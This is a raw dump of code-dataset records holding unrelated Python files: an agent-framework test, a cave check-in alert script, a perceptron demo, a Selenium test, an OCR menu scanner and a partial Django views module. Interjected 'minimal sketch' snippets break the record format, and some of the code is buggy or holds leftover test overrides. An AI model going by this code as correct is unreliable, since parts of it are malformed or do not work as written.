self.agent.value = 2000\n\n stopbehah = StopBehav()\n 
dummybehav = DummyBehav()\n\n agent1.add_behaviour(dummybehav)\n agent1.add_behaviour(stopbehah)\n\n future1 = agent1.start(auto_register=False)\n future1.result()\n\n stopbehah.join()\n\n assert not agent1.is_alive()\n assert agent1.value == 1000\n", "sub_path": "tests/test_agent.py", "file_name": "test_agent.py", "file_ext": "py", "file_size_in_byte": 6358, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "spade.agent.Agent", "line_number": 16, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 17, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 28, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 40, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 53, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 58, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 66, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 67, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 76, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 82, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 87, "usage_type": "call"}, {"api_name": "aioxmpp.PresenceManagedClient", "line_number": 92, "usage_type": "name"}, {"api_name": "factories.MockedAgentFactory", "line_number": 96, "usage_type": "call"}, {"api_name": "asynctest.Mock", "line_number": 97, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 108, "usage_type": "call"}, {"api_name": "aioxmpp.Message", "line_number": 109, "usage_type": "call"}, {"api_name": "aioxmpp.MessageType", "line_number": 109, "usage_type": "attribute"}, {"api_name": "spade.message.Message.from_node", "line_number": 110, "usage_type": "call"}, {"api_name": "spade.message.Message", "line_number": 110, "usage_type": "name"}, {"api_name": "testfixtures.LogCapture", "line_number": 116, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 129, "usage_type": "name"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 134, "usage_type": "name"}, {"api_name": "factories.MockedAgentFactory", "line_number": 136, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 143, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 162, "usage_type": "name"}, {"api_name": "spade.agent.Agent", "line_number": 167, "usage_type": "name"}, {"api_name": "factories.MockedAgentFactory", "line_number": 169, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 176, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 177, "usage_type": "call"}, {"api_name": "asynctest.Mock", "line_number": 178, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 179, "usage_type": "call"}, {"api_name": "asynctest.Mock", "line_number": 180, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 198, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 200, "usage_type": "name"}, {"api_name": "spade.template.Template", "line_number": 204, "usage_type": "call"}, {"api_name": "spade.message.Message", "line_number": 211, "usage_type": "call"}, {"api_name": 
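A minimal sketch of the send/receive pattern exercised by test_submit_send above, assuming an already-started spade agent bound to the name agent; the peer JID and performative are illustrative.

from spade.behaviour import OneShotBehaviour
from spade.message import Message

class PingBehav(OneShotBehaviour):
    async def run(self):
        msg = Message(to="peer@host", body="ping", metadata={"performative": "inform"})
        await self.send(msg)
        reply = await self.receive(timeout=10)  # None if nothing arrives in time
        print("got:", reply.body if reply else "no reply")

agent.add_behaviour(PingBehav())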
"factories.MockedAgentFactory", "line_number": 221, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 224, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 226, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "597332872", "text": "import datetime as dt\nimport threading\nimport twilio_functions as tw\n\nCAVEMANAGER = (\"Desolation Wilderness\", \"Ranger Maria\", 7146810524) #to be hard coded into device\n##############################################\n##############################################\n# UPDATE: to be imported somehow from database\n##############################################\n##############################################\ncheck_in = {\"photo\": \"123.jpg\", \"date_time\": dt.datetime(2020,3,7,10,0),\n\"user\": (123456, \"Sonia Meyer\", 7146810524), \"group_size\": 3,\n\"expected_out\": dt.datetime(2020,3,7,18,0), \"call_out\": dt.datetime(2020,3,8,8,0)}\ncheck_out = {\"photo\": \"456.jpg\", \"date_time\": dt.datetime(2020,3,7,18,30),\n\"user\": (123456, \"Sonia Meyer\", 7146810524), \"group_size\": 3}\nmissed_checkout = {\"photo\": \"456.jpg\", \"date_time\": dt.datetime(2020,3,7,23,00),\n\"user\": (123456, \"Sonia Meyer\", 7146810524), \"group_size\": 3}\n##############################################\n##############################################\n\n#code for initiate_contact time\nexpected_out = check_in[\"expected_out\"]\ncall_out = check_in[\"call_out\"]\ninitiate_contact = expected_out + (call_out - expected_out) / 2\ntoo_late = dt.time(23,1)\ntoo_early = dt.time(6,59)\nif too_early > initiate_contact.time() or initiate_contact.time() > too_late: #if out of range\n initiate_contact = initiate_contact.combine(expected_out.date(), too_late) #replace with reasonable time\nif initiate_contact.time() < expected_out.time(): #if reasonable time is earlier than expected out time\n initiate_contact = expected_out #replace with expected out time\n\n#code for missed_expected_out\n#the missed_expected_out will check user status at initiate_contact time,\n#then check with user if they forgot to check out of cave\ndelay_expected_out = initiate_contact - dt.datetime.now()\ndelay_expected_out = 3 #delete later!!!!\ncheck_out = {} #delete later, testing no check out\nexpected_out_timer = threading.Timer(delay_expected_out, tw.missed_expected_out)\nexpected_out_timer.start()\n\n#code for missed_call_out\n#the missed_call_out will check user status at call out time, then notify\n#the cave manager to initiate rescue if user is not out\ndelay_call_out = call_out - dt.datetime.now()\ndelay_call_out = 3 #delete later!!!!\n#check_out = {} #delete later, testing no check out\ncall_out_timer = threading.Timer(delay_call_out, tw.missed_call_out)\ncall_out_timer.start()\n", "sub_path": "database/check_in.py", "file_name": "check_in.py", "file_ext": "py", "file_size_in_byte": 2396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 26, "usage_type": "call"}, {"api_name": 
"datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "threading.Timer", "line_number": 38, "usage_type": "call"}, {"api_name": "twilio_functions.missed_expected_out", "line_number": 38, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "threading.Timer", "line_number": 47, "usage_type": "call"}, {"api_name": "twilio_functions.missed_call_out", "line_number": 47, "usage_type": "attribute"}]} +{"seq_id": "214221771", "text": "import random\nfrom sklearn.datasets import make_blobs, make_classification\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef getPred(x, w):\n '''Returns predicted label for the data point x based on w'''\n x = np.reshape(x, [1, x.shape[0]])\n return np.matmul(x, np.transpose(w))[0] > 0\n\n\ndef getError(X, w, y):\n '''Returns error (number of misclassified samples) and an array of the indexes of misclassified samples'''\n preds = np.array([getPred(x, w)[0] for x in X])\n errors = preds != y\n return (sum(errors), np.where(errors)[0])\n\n\ndef plotPLA(X, w, y, pause = None):\n '''Plots the decision boundary given by w over the labeled data set.\n If pause is provided a non blocking plot is generated that will be displayed for pause seconds'''\n # plot decision boundary from w\n x1list = np.linspace(-5, 5, 1000) # Create 1-D arrays for x1,x2 dimensions\n x2list = np.linspace(-5, 5, 1000) \n x1,x2 = np.meshgrid(x1list, x2list) # Create 2-D grid x1list,x2list values\n Z = x1*w[0][1] + x2*w[0][2] + w[0][0] # equation of line\n plt.contour(x1, x2, Z, levels=[0])\n\n # plot labeled data points\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'r_')\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'b+')\n\n if(pause):\n plt.show(block=False)\n plt.pause(pause)\n plt.close()\n else:\n plt.show()\n\n\n# generate 2d classification dataset - not always linearly separable\nX, y = make_classification(n_samples=100, n_features=2, n_informative=2, n_redundant=0, n_repeated=0, n_clusters_per_class=1, class_sep=2, flip_y=0)\nn = X.shape[0] # save number of samples\nplotX = X # normal X matrix for plots\nX = np.array([np.append(1, x) for x in X]) # augmented X matrix\n\nw = np.zeros([1,3]) # initialize w to zero vector\n\n# variables for pocket PLA\nw_best = w\nerror_best = n\n\nplotPLA(plotX, w, y)\n\n# perform pla\n_iter = 0\nmax_iter = 50\nerror, misclassifieds = getError(X, w, y)\nwhile(error > 0 and _iter < max_iter):\n # randomly choose a misclassified point\n i = random.choice(misclassifieds)\n x = X[i]\n pred = getPred(x, w)\n w = w + ((y[i]-pred)*x) # update w\n _iter += 1\n error, misclassifieds = getError(X, w, y)\n \n # store best w in pocket\n if error < error_best:\n error_best = error\n w_best = w\n\n plt.title(f\"Iteration {_iter}: Misclassified {error}/{n}\")\n plotPLA(plotX, w, y, pause=0.5)\n\nw = w_best\nif(error_best == 0):\n plt.title(f\"Correctly classified all points after {_iter} iterations\")\nelse:\n plt.title(f\"Failed to classify all points after {_iter} iterations\\nBest weights correctly classified {n-error_best}/{n} points\")\n\nplotPLA(plotX, w, y)\n\n", "sub_path": "pla.py", "file_name": "pla.py", "file_ext": "py", "file_size_in_byte": 2677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.reshape", 
"line_number": 9, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contour", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "344123524", "text": "\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nimport time\r\nimport pytest\r\n\r\nbrowser= webdriver.Chrome()\r\nbrowser.get(\"https://ati.su/\")\r\n\r\n\r\nDEPARTURE_POINT_NAME= 'Беларусь'\r\nISSUE_POINT_NAME = 'Россия'\r\n\r\n#Действия со списком, пункт отправки\r\n#Вписать пункт отправки и выбрать из выпад.списка нужное поле\r\nDEPARTURE_POINT_OPEN_TABLE = browser.find_element(By.CSS_SELECTOR,\"[placeholder='Например, Москва']\").send_keys(DEPARTURE_POINT_NAME)\r\nDEPARTURE_POINT_IN_LIST = WebDriverWait(browser, 1).until( EC.element_to_be_clickable((By.XPATH,\"//*[@id='react-autowhatever-from--item-0']/div/span\")) )\r\nDEPARTURE_POINT_IN_LIST.click()\r\n\r\n\r\n# выбрать из выпадающего списка пункт доставки\r\nISSUE_POINT_OPEN_TABLE = 
browser.find_element(By.CSS_SELECTOR,\"[placeholder='Например, Санкт-Петербург']\").send_keys(ISSUE_POINT_NAME)\r\nISSUE_POINT_IN_LIST = WebDriverWait(browser, 1).until( EC.element_to_be_clickable((By.XPATH,\".//div[contains(@class,'suggestion')]\")))\r\nISSUE_POINT_IN_LIST.click()\r\n\r\n\r\n#Нажать на кнопку поиска\r\nSEARCH_BUTTON = browser.find_element(By.CSS_SELECTOR, \"[data-qa='us-search-loads']\")\r\nSEARCH_BUTTON.click()\r\n\r\n\r\n#перейти на 2ое окно\r\nbrowser.switch_to.window(browser.window_handles[1])\r\n\r\n\r\nSHOW_CONTACTS_BUTTON = WebDriverWait(browser, 1).until( EC.element_to_be_clickable((By.XPATH,\"//div[last () and contains(@class, 'W-P2T')]\")))\r\nSHOW_CONTACTS_BUTTON.click()\r\n\r\n\r\n# Убедиться что появился попап регистрации пользователя\r\nassert len(browser.find_element(By.CSS_SELECTOR,\"iframe[title='Login popup']\")) == 1\r\n\r\n\r\ntime.sleep(3)\r\nbrowser.quit()\r\n", "sub_path": "transport_check.py", "file_name": "transport_check.py", "file_ext": "py", "file_size_in_byte": 2021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 26, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 39, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 44, 
"usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "473779746", "text": "import matplotlib.pyplot as plt\nfrom PIL import Image\nimport pytesseract\nimport re\n# import easygui\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\n\ndef Area_Split(img, start_index, end_index, alpha=2, interval=2, ax=0):\n \"\"\"\n :param img: 化成矩阵格式的图片\n :param start_index: 开始位置\n :param end_index: 结束为止\n :param alpha: 阈值分割\n :param ax: 0为按行,1为按列\n :return: 分割索引列表\n \"\"\"\n index_list = []\n flag = 0\n start = 0\n for i in range(start_index, end_index):\n if ax == 1: # 按列\n line = img[:, i:i + interval]\n else:\n line = img[i:i + interval, :]\n count = np.count_nonzero(line)\n if count >= alpha and flag == 0: # 开始\n start = i\n flag = 1\n elif count < alpha and flag == 1: # 结束\n end = i\n flag = 0\n index_list.append((start + end) / 2)\n\n return index_list\ndef exmatch(str1,str2): #初步匹配\n n=0\n for i in range(len(str1)):\n for j in range(len(str2)):\n if str1[i]==str2[j]:\n n +=1\n return n\n\ndef match(str1,list1): #匹配\n t=0\n index = 0\n for i in range(len(list1)):\n if(exmatch(str1,list1[i])>t):\n t=exmatch(str1,list1[i])\n index=i\n return list1[index]\n\ndef cutter(list):\n img = Image.open(str) # 打开当前路径图像\n box1 = (int(list[0]), int(list[1]),int(list[2]) ,int(list[3] )) # 设置图像裁剪区域\n img1 = img.crop(box1) # 图像裁剪\n return img1 #返回裁剪好的图片\n\ndef connect(list1):\n list=[]\n list.append(list1[0][0])\n list.append(list1[0][1])\n list.append(list1[2][0])\n list.append(list1[2][1])\n return list\n\ndef findnum(string):\n comp=re.compile(r'\\d+')\n list_str=comp.findall(string)\n list_num=[]\n for item in list_str:\n item=int(item)\n list_num.append(item)\n price= int(list_num[0])\n return price\n\ndef scan(str_1):\n\n image = Image.open(str_1)\n h, w = image.size\n while h * w / 1024 / 1024 > 1:\n h, w = h * 0.9, w * 0.9\n size = h, w\n image.thumbnail(size, Image.ANTIALIAS)\n\n img = np.array(image, dtype='float')\n print(np.shape(img))\n\n # plt.imshow(img)\n # plt.show()\n\n r = img[:, :, 0]\n g = img[:, :, 1]\n b = img[:, :, 2]\n\n # 标准差\n x_ = (r + g + b) / 3\n std = (r - x_) * (r - x_) + (g - x_) * (g - x_) + (b - x_) * (b - x_)\n std = np.sqrt(std/3)\n mask_std = std > 7\n\n mask_1 = g > b\n mask_2 = g > r\n mask_3 = g > 0\n mask_color = np.logical_and(mask_1, mask_2)\n mask_color = np.logical_and(mask_color, mask_3)\n mask_color_std = np.logical_and(mask_color, mask_std)\n mask_not_color_std = np.logical_not(mask_color_std)\n\n img[:, :, 0][mask_not_color_std] = 0\n img[:, :, 1][mask_not_color_std] = 0\n img[:, :, 2][mask_not_color_std] = 0\n\n img[:, :, 0][mask_color_std] = 0\n img[:, :, 1][mask_color_std] = 255\n img[:, :, 2][mask_color_std] = 0\n\n new_img = img[:, :, 1]\n new_img = new_img / 255\n rows, cols = np.shape(new_img)\n\n # plt.imshow(new_img, cmap='Greys')\n # plt.show()\n\n vertical_index = Area_Split(new_img, 0, cols, alpha=100, interval=50, ax=1)\n # horizontal_index = Area_Split(new_img, 0, rows, alpha=20, interval=10, ax=0)\n\n # 垂直划分测试\n # for index in vertical_index:\n # # plt.axvline(index, color='green')\n # plt.axvline(index-40)\n # plt.axvline(index+40)\n\n dot_list = []\n for v_index in vertical_index:\n start_index = v_index - 60\n end_index = v_index + 60\n # plt.imshow(new_img, cmap='Greys')\n # plt.axvline(start_index)\n # plt.axvline(end_index)\n horizontal_index = Area_Split(new_img[:, 
int(start_index):int(end_index)], 0, rows, alpha=20, interval=20, ax=0)\n for h_index in horizontal_index:\n # plt.axhline(h_index, color='blue')\n dot_list.append([v_index, h_index])\n # plt.show()\n\n v_bias = 40\n h_bias = 400\n border_list = []\n for dot in dot_list:\n plt.plot(dot[0], dot[1], '.r')\n p1 = [dot[0], dot[1]-v_bias]\n p2 = [dot[0], dot[1]+v_bias]\n p3 = [dot[0]+h_bias, dot[1]+v_bias]\n p4 = [dot[0]+h_bias, dot[1]-v_bias]\n p_list = [p1, p2, p3, p4]\n border_list.append(p_list)\n for i in range(len(p_list)):\n plt.plot([p_list[i-1][0], p_list[i][0]], [p_list[i-1][1], p_list[i][1]], 'b')\n plt.imshow(image)\n plt.show()\n print(border_list)\n\n\n # f = open('菜单.txt','r', encoding='UTF-8')\n list1=[\"牛油鸳鸯锅48元/份\", \"清油鸳鸯锅48元/份\", \"菌汤锅48元/份\", \"大骨汤百味锅48元/份\",\n \"番茄锅48元/份\", \"清油红锅48元/份\",\"牛油红锅48元/份\",\"香油碟5元/份\",\"香辣干碟3元/份\",\n \"原汤碟4元/份\", \"金牌脆毛肚32元/份\", \"草原千层肚29/份\", \"麻辣牛肉26元/份\", \"鲜红苕粉8元/份\",\n \"安格斯肥牛22元/份\", \"麻辣小郡肝22元/份\", \"荷包肉22元/份\", \"鲜鸭血8元/份\", \"果蔬鲜肉丸18元/份\",\n \"五香郡把15元/份\", \"鸡翅尖6元/份\", \"鹌鹑蛋12元/份\", \"金牌牛黄喉26元/份\", \"精品猪黄喉28元/份\",\n \"嫩滑牛肉24元/份\", \"霸王牛肉26元/份\", \"虾滑28元/份\", \"鲜鸭舌16元/份\", \"鸭郡花18元/份\",\n \"去骨鸭掌18元/份\", \"宜宾小香肠16元/份\", \"鲜脑花8元/个\", \"鲜毛肚25元/份\", \"极品鳕鱼18元/份\",\n \"肥肠节子3元/节\", \"极品耗儿鱼28元/份\", \"正大午餐肉12元/份\", \"海霸王虾饺12元/份\", \"三秒乌鱼片28元/份\",\n \"黄辣丁15元/份\", \"雪花牛肉38元/份\", \"羊肉卷22元/份\", \"精选五花肉15元/份\", \"红酒腰片25元/份\",\n \"霸王排骨28元/份\", \"美好火腿肠8元/份\", \"脆皮肠8元/份\", \"盐焗肚条24元/份\", \"无刺巴沙鱼26元/份\",\n \"卤肥肠25元/份\", \"水晶土豆片\", \"藕片\", \"萝卜\", \"306冬瓜\", \"307黄瓜\", \"308豌豆尖\", \"309生菜\",\n \"310大白菜\", \"311凤尾\", \"312折耳根\", \"313黄豆芽\", \"314豆皮\", \"315山药\", \"316鲜豆腐\", \"317木耳\",\n \"318金针菇\", \"319香菇\", \"320青菜头\", \"321竹海笋片王\", \"322后切土豆\", \"501红糖糍粑\", \"502什锦蛋炒饭\",\n \"503酿糟小汤圆\", \"504现炸酥肉\", \"505红糖冰粉\", \"506印度飞饼\", \"507八宝粥\", \"508酱油炒饭\"]\n list_result=[]\n # for each_lines in f:\n # line1=each_lines.replace('\\n','')\n # line2=line1.replace(' ','')\n # list1.append(line2)\n\n for line in border_list:\n list2=connect(line)\n img = Image.open(str_1) # 打开当前路径图像\n box1 = (int(list2[0]), int(list2[1]), int(list2[2]), int(list2[3])) # 设置图像裁剪区域\n img1 = img.crop(box1) # 图像裁剪\n aa=img1\n\n plt.imshow(aa)\n str3 = str(pytesseract.image_to_string(aa, lang='chi_sim'))\n str1 = str3.replace(' ', '')\n str4='识别结果:'+str1+' 匹配结果:'+match(str1, list1)+'\\n'\n list_result.append(str4)\n print('识别结果', 'demo', list_result)\n return list_result\n", "sub_path": "img_scan_2/img_scan_2/scan.py", "file_name": "scan.py", "file_ext": "py", "file_size_in_byte": 7454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.count_nonzero", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 86, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 86, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.logical_and", 
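A minimal alternative sketch of the exmatch/match scoring above: score each menu entry by the distinct characters it shares with the OCR output and keep the best-scoring entry (the original counts pairwise matches including duplicates; set intersection is a cheaper approximation).

def best_match(ocr_text, menu):
    # More shared characters -> better candidate
    return max(menu, key=lambda entry: len(set(ocr_text) & set(entry)))

print(best_match("牛油鸳鸯锅48", ["牛油鸳鸯锅48元/份", "菌汤锅48元/份"]))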
"line_number": 108, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 190, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 196, "usage_type": "call"}]} +{"seq_id": "355211343", "text": "# coding=utf-8\nfrom collections import deque\nfrom itertools import cycle\nimport math\nimport json\nfrom xml.dom import minidom\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Max\nfrom django.shortcuts import render_to_response, render, get_object_or_404\nfrom django.template import loader, Context\nfrom django.template.context import RequestContext\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect, HttpResponseNotFound, HttpResponseForbidden, HttpResponseBadRequest\nfrom django.template.defaulttags import firstof\nfrom django.views.decorators.http import require_POST\nfrom kickme.tournament.models import *\nfrom django.utils.translation import ugettext as _\nfrom social_auth.db.django_models import UserSocialAuth\nimport urllib2\nfrom django.utils import translation\nfrom kickme.tournament.forms import *\n\n\ndef ajax_required(f):\n \"\"\"\n AJAX request required decorator\n use it in your views:\n\n @ajax_required\n def my_view(request):\n ....\n\n \"\"\"\n\n def wrap(request, *args, **kwargs):\n if not request.is_ajax():\n return HttpResponseBadRequest()\n return f(request, *args, **kwargs)\n\n wrap.__doc__ = f.__doc__\n wrap.__name__ = f.__name__\n return wrap\n\n\ndef google(request):\n return HttpResponse('google-site-verification: googlecdc03dfda8ab335e.html')\n\n\ndef alexa(request):\n return HttpResponse(\"\"\"\n \n \n \n \n
Great! The file uploaded properly. Now click the 'Verify my file' button to\n complete the process.
\n \n\n\"\"\")\n\n\ndef yahoo(request):\n return HttpResponse('')\n\n\ndef mailru(request):\n return render_to_response('receiver.html', {}, context_instance=RequestContext(request))\n\n\ndef index(request):\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n\n\n@login_required\ndef settings_account(request):\n social_auth = UserSocialAuth.get_social_auth_for_user(request.user)\n social_auth = request.user.social_auth.all()\n available_auth = {\n 'facebook': 'Facebook',\n 'twitter': 'Twitter',\n 'vk-oauth': 'vkontakte',\n 'linkedin': 'LinkedIn',\n }\n screen_name = ''\n for auth in social_auth:\n # if auth.provider == 'twitter':\n # url = \"http://api.twitter.com/1/users/show.xml?user_id=\" + auth.uid\n # doc = urllib2.urlopen(url)\n # parsed = minidom.parse(doc)\n # screen_name = parsed.getElementsByTagName('screen_name')[0].firstChild.nodeValue\n if auth.provider in available_auth:\n del (available_auth[auth.provider])\n\n return render_to_response(\n 'settings/account.html',\n {\n 'social_auth': social_auth,\n 'available_auth': available_auth,\n 'screen_name': screen_name,\n },\n context_instance=RequestContext(request)\n )\n\n\n@login_required\ndef tournament_add(request, thash=None):\n tourn = None\n if thash:\n tourn = get_object_or_404(Tournament, thash=thash)\n form = TournamentForm(instance=tourn)\n else:\n form = TournamentForm()\n\n if request.method == 